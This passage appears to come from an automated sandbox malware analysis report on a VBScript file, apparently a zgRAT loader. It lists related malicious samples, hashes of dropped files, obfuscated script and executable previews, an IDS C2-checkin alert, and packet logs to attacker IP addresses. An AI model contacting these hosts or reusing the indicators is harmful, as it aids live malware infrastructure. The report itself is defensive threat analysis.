                                                                                                  TiOWA908TP.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 51.159.14.89
                                                                                                  http://aeromorning.comGet hashmaliciousUnknownBrowse
                                                                                                  • 212.129.3.113
                                                                                                  12E56QE1Fc.exeGet hashmaliciousAzorultBrowse
                                                                                                  • 51.15.142.235
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  3b5074b1b5d032e5620f69f9f700ff0e0969686.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                                  • 51.159.14.89
                                                                                                  Inquiry.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                                  • 51.159.14.89
                                                                                                  17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                                  • 51.159.14.89
                                                                                                  NEW SHIPPING DOCUMENTS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  • 51.159.14.89
                                                                                                  Company introduction.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 51.159.14.89
                                                                                                  new order.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  • 51.159.14.89
                                                                                                  rDEKONT-1_15_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 51.159.14.89
                                                                                                  NLWfV87ouS.dllGet hashmaliciousWannacryBrowse
                                                                                                  • 51.159.14.89
                                                                                                  542CxvZnI5.dllGet hashmaliciousVirut, WannacryBrowse
                                                                                                  • 51.159.14.89
                                                                                                  https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/b/?_encoding=UTF8&_encoding=UTF8&node=3024314031&bbn=16435051&pd_rd_w=VSdHJ&content-id=amzn1.sym.01fcb23a-92a2-4260-b9bf-7c78abf408da&pf_rd_p=01fcb23a-92a2-4260-b9bf-7c78abf408da&pf_rd_r=E0WD16QK99B55VAWSKBQ&pd_rd_wg=EU3Lj&pd_rd_r=fd3510c2-a6e6-4f59-a468-c59aac80bfa9&ref_=pd_hp_d_btf_unkGet hashmaliciousUnknownBrowse
                                                                                                  • 51.159.14.89
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeINQ24-0122070030786451.batGet hashmaliciousUnknownBrowse
                                                                                                    8820_715_SCAN.vbsGet hashmaliciousUnknownBrowse
                                                                                                      PaymentAdvice-1629043.vbsGet hashmaliciousNeshtaBrowse
                                                                                                        FileCopy.vbsGet hashmaliciousUnknownBrowse
                                                                                                          Pyyidau.vbsGet hashmaliciousNetSupport RATBrowse
                                                                                                            Pyyidau.vbsGet hashmaliciousNetSupport RATBrowse
                                                                                                              GRAINS.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                PRODUCT-PICTURE.batGet hashmaliciousAgentTeslaBrowse
                                                                                                                  Fattura-24SC-99245969925904728562.vbsGet hashmaliciousDiscord Token StealerBrowse
                                                                                                                    ilZhNx3JAc.batGet hashmaliciousAgentTeslaBrowse
                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1434
                                                                                                                      Entropy (8bit):5.342612360333169
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:ML9E4KlKDE4KhKiKhRAE4KzecKIE4oKNzKoZsXE4qdKqE4Kx1qE4DJE4TE4Ks:MxHKlYHKh3oRAHKzectHo60H8HKx1qHN
                                                                                                                      MD5:522A73769A186964B7301AF1CBF6AF40
                                                                                                                      SHA1:99FD48F31A76D9984243447AB9A0F00F3527463A
                                                                                                                      SHA-256:9FCD97D035F201EA395E416D2C082AA59CB814B7EC1F3B72C97A870FEBBE097A
                                                                                                                      SHA-512:5548DA45D1D1DFE399DCEEA81720B1B24F83FFCD775573B8A7F62A779D84853262EB97BA4142BE71DD19204FE5594949B6F2BB4650BDEAC17FEA17D6F703785A
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Managemen
                                                                                                                      Process:C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):8003
                                                                                                                      Entropy (8bit):4.840877972214509
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                                                                      MD5:106D01F562D751E62B702803895E93E0
                                                                                                                      SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                                                                      SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                                                                      SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                                                                      Malicious:false
                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                      Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                      Process:C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                      Process:C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                      Process:C:\Windows\System32\cmd.exe
                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):433152
                                                                                                                      Entropy (8bit):5.502549953174867
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:MF45pGVc4sqEoWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:95pGVcwW2KXzJ4pdd3klnnWosPhnzq
                                                                                                                      MD5:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                      SHA1:F5EE89BB1E4A0B1C3C7F1E8D05D0677F2B2B5919
                                                                                                                      SHA-256:73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70
                                                                                                                      SHA-512:6E43DCA1B92FAACE0C910CBF9308CF082A38DD39DA32375FAD72D6517DEA93E944B5E5464CF3C69A61EABF47B2A3E5AA014D6F24EFA1A379D4C81C32FA39DDBC
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Joe Sandbox View:
                                                                                                                      • Filename: INQ24-0122070030786451.bat, Detection: malicious, Browse
                                                                                                                      • Filename: 8820_715_SCAN.vbs, Detection: malicious, Browse
                                                                                                                      • Filename: PaymentAdvice-1629043.vbs, Detection: malicious, Browse
                                                                                                                      • Filename: FileCopy.vbs, Detection: malicious, Browse
                                                                                                                      • Filename: Pyyidau.vbs, Detection: malicious, Browse
                                                                                                                      • Filename: Pyyidau.vbs, Detection: malicious, Browse
                                                                                                                      • Filename: GRAINS.vbs, Detection: malicious, Browse
                                                                                                                      • Filename: PRODUCT-PICTURE.bat, Detection: malicious, Browse
                                                                                                                      • Filename: Fattura-24SC-99245969925904728562.vbs, Detection: malicious, Browse
                                                                                                                      • Filename: ilZhNx3JAc.bat, Detection: malicious, Browse
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......".z.fg..fg..fg..x5..dg..o...lg..r...eg..r...}g..fg...g..r...cg..r...og..r...ng..r..gg..r...gg..Richfg..........................PE..L...s/.0..........................................@......................................@...... ...........................".......0...}......................|....I..T............................................ ...............................text...\........................... ..`.data...8...........................@....idata....... ......................@..@.rsrc....}...0...~..................@..@.reloc..|...........................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                      File type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                      Entropy (8bit):6.491497157970056
                                                                                                                      TrID:
                                                                                                                        File name:RFQ_43200046412000086500125.vbs
                                                                                                                        File size:878'813 bytes
                                                                                                                        MD5:e94f2e506d40bd58b44646f3fac80747
                                                                                                                        SHA1:cf96f6bd5e8f37b0ec204ea98029de3dd70ecfdb
                                                                                                                        SHA256:df53a625989cecc35e201e16649966ed99d8df4e71b7b9b53c1a5767e7235332
                                                                                                                        SHA512:edb287df5b443ad2c0379bee468f7119645620038375043dcbd0dd59719d1fe8934e7e267bdaa89213e146b8c9513d960f98de2f404467278f1ceb43f990552a
                                                                                                                        SSDEEP:12288:omfyhMxfwxxaTxRviNeStN4GlT613i+kx3t8SWq9Fq/5MQCZiY4E6yzztdX:V66mHLUi+kx3t8SWq9F28tGyP
                                                                                                                        TLSH:B915CFA21E34ED8873986939BEAC3150D3E0DF7B2D77D62052A7EB5E1B2A8411710F71
                                                                                                                        File Content Preview:' 97VEa+1soBVQa2G4SSPttZCPtZhG0j2W2rDkwlgF3TsK24HxKUFb9SQnG42DSYMUHXfrJ7xrGCR3rpA8iN68So0lrm2h+4tPNMBzH7evEpAtz6ThGrV/nsJdeXuwHmxGatAAXpsWcyLrnPP8+PltyJv/D7g52y/Xpg+qRIIPnhZTLbXmr7T1FlyC9X7CgqbJ8LHgsQ60DI6hKLeLay+g2/7dqMpEhhnnCfhbt+axFSNp4VTQL+0HnyEmRYf8a
                                                                                                                        Icon Hash:68d69b8f86ab9a86
                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                        2025-01-15T11:38:34.356744+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.449737194.226.169.2279910TCP
                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Jan 15, 2025 11:38:09.526221037 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:09.526312113 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:09.526717901 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:09.533427954 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:09.533505917 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.207216978 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.207348108 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.227142096 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.227185965 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.228049040 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.258254051 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.299340010 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.546318054 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.546377897 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.546457052 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.546471119 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.546505928 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.546545982 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.546580076 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.546580076 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.546618938 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.556159019 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.556229115 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.556273937 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.556303024 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.556333065 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.608263969 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.638767958 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.638802052 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.638870955 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.638909101 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.638936996 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.638947964 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.638977051 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.639009953 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.647489071 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.647550106 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.647583961 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.647629976 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.647641897 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.647701979 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.649271011 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.649318933 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.649349928 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.649363041 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.649396896 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.649435997 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.651107073 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.651155949 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.651191950 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.651202917 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.651264906 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.651289940 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.731175900 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.731245041 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.731297970 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.731363058 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.731405020 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.731534958 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.739818096 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.739878893 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.739914894 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.739950895 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.739974976 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.740309954 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.740914106 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.740978003 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.741007090 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.741039038 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.741050005 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.741101027 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.741667986 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.741713047 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.741753101 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.741764069 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.741796970 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.741816044 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.742651939 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.742693901 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.742732048 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.742743969 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.742773056 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.742790937 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.744251013 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.744297981 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.744342089 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.744353056 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.744386911 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.744405985 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.815500975 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.815567970 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.815618992 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.815650940 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.815681934 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.815701962 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.823467970 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.823524952 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.823611975 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.823626995 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.823664904 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.826463938 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.832376003 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.832470894 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.832499027 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.832523108 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.832546949 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.832576990 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.832736015 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.832802057 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.832844973 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.832855940 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.832884073 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.832906961 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.833055019 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.833100080 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.833136082 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.833144903 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.833189964 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.833208084 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.833539963 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.833586931 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.833632946 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.833642960 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.833673954 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.833698034 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.836756945 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.836800098 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.836839914 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.836850882 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.836879969 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.836898088 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.837048054 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.837088108 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.837131977 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.837141991 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.837173939 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.837208033 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.908005953 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.908083916 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.908119917 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.908169985 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.908185005 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.908219099 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.916057110 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.916101933 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.916153908 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.916167974 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.916203976 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.916224957 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.924669981 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.924730062 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.924772024 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.924803019 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.924834013 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.924856901 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.925038099 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.925085068 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.925129890 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.925141096 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.925174952 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.925195932 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.925353050 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.925393105 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.925429106 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.925438881 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.925482035 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.925506115 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.925649881 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.925690889 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.925726891 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.925735950 CET4434973051.159.14.89192.168.2.4
                                                                                                                        Jan 15, 2025 11:38:10.925770044 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.925793886 CET49730443192.168.2.451.159.14.89
                                                                                                                        Jan 15, 2025 11:38:10.925935984 CET4434973051.159.14.89192.168.2.4
